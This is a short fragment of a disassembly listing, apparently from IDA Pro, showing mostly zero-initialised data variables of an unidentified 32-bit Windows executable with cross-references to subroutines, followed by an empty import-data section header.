dword_511988 dd 0 ; DATA XREF: sub_507333+3F�r
; sub_507494+1B2�w ...
dword_51198C dd 0 ; DATA XREF: sub_507333+5D�r
; sub_507494+1E0�w ...
dword_511990 dd 0 ; DATA XREF: sub_507333+13D�r
; sub_507494+20E�w ...
dword_511994 dd 0 ; DATA XREF: sub_507333+1E�r
; sub_507494+23C�w ...
dword_511998 dd 0 ; DATA XREF: sub_507333+C2�r
; sub_507333+FF�r ...
dword_51199C dd 0 ; DATA XREF: sub_507333+6B�r
; sub_507494+298�w ...
dword_5119A0 dd 20h dup(0) ; DATA XREF: sub_507333+CF�o
; sub_507494+45�o ...
dword_511A20 dd 0 ; DATA XREF: sub_508892+27�w
; sub_508892+32�r
align 8
dword_511A28 dd 77FC5860h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4FD2E0+3A8�o
; sub_50848C+6�o ...
byte_511A40 db 0 ; DATA XREF: sub_508892+7�r
; sub_508892+15�r ...
align 4
dword_511A44 dd 940000h ; DATA XREF: sub_508397+4�r
; sub_508397+22�w ...
dword_511A48 dd 62Bh dup(0) ; DATA XREF: sub_50848C+11�o
; sub_5084F7+5�o
dword_5132F4 dd 894h dup(0) ; CODE XREF: _6:0050E2F8�j
db 0
byte_515545 db 3 dup(0) ; DATA XREF: _2:0045469C�o
dd 140h dup(0)
dword_515A48 dd 0 ; DATA XREF: sub_508892+7C�r
; sub_508892+82�w ...
align 10h
dword_515A50 dd 0 ; DATA XREF: sub_4FC15E+25�r
; sub_4FC15E+4A�r ...
dword_515A54 dd 0 ; DATA XREF: sub_4FC216+23�r
; sub_4FC216+2B�r ...
dword_515A58 dd 2 dup(0) ; DATA XREF: sub_4FC3F3+32�o
dword_515A60 dd 0 ; DATA XREF: sub_4FC271+2C�w
; sub_4FC271+57�o
align 8
dword_515A68 dd 0 ; DATA XREF: sub_4FC271+36�w
dd 2 dup(0)
dword_515A74 dd 0 ; DATA XREF: sub_4FC271+52�w
dd 4 dup(0)
dword_515A88 dd 0 ; DATA XREF: sub_4FC271+40�w
align 10h
dword_515A90 dd 0ECh dup(0) ; DATA XREF: sub_508EF3+28�o
; sub_508EF3+42�o ...
byte_515E40 db 0 ; DATA XREF: sub_5090EF+71�w
; sub_5090EF+8F�r
byte_515E41 db 0 ; DATA XREF: sub_5090EF+7B�w
byte_515E42 db 0 ; DATA XREF: sub_5090EF+85�w
align 4
dd 13h dup(0)
dword_515E90 dd 42h dup(0) ; DATA XREF: sub_5090EF+B�o
; sub_5090EF+17�o ...
dword_515F98 dd 40h dup(0) ; DATA XREF: sub_509638+AB�o
; sub_50971C+5D�o
dword_516098 dd 77FC5A00h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_509638+25�o
; sub_509696�o ...
dword_5160B0 dd 0 ; DATA XREF: sub_509638+34�r
; sub_509638+4E�w ...
align 8
dword_5160B8 dd 77FC59E0h, 0 ; DATA XREF: sub_509DD4+6�o
; sub_50A0C8+25�o
dd 1, 0DCh, 2 dup(0)
byte_5160D0 db 1 ; DATA XREF: sub_509C54:loc_509C64�r
; sub_50A0C8+30�w
align 4
dword_5160D4 dd 942110h ; DATA XREF: sub_5053D0+D�r
; sub_5053D0+26�r ...
dword_5160D8 dd 942358h ; DATA XREF: sub_5050D0+264�r
; sub_509DD4+72�w ...
dword_5160DC dd 0 ; DATA XREF: sub_4FD2E0+3FD�w
dword_5160E0 dd 0 ; DATA XREF: sub_50B677+2F�w
; sub_50B677+47�r
byte_5160E4 db 0 ; DATA XREF: sub_50B677+4�r
; sub_50B677+12�r ...
align 4
dword_5160E8 dd 0 ; DATA XREF: sub_4FCA80+28�r
; sub_4FCA80+4C�w ...
dd 2 dup(0)
dword_5160F4 dd 0 ; DATA XREF: sub_4FC86E+4�r
; sub_4FC86E+9D�r ...
dd 3 dup(0)
dword_516104 dd 0 ; DATA XREF: sub_4FCA80+C0�r
; sub_4FCDBF+A6�r
dd 0
dword_51610C dd 0 ; DATA XREF: sub_4FCDBF+26�r
; sub_4FCDBF:loc_4FCE29�w
_7 ends
; Section 9. (virtual address 00117000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00116200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 517000h
align 2000h
_idata2 ends
end start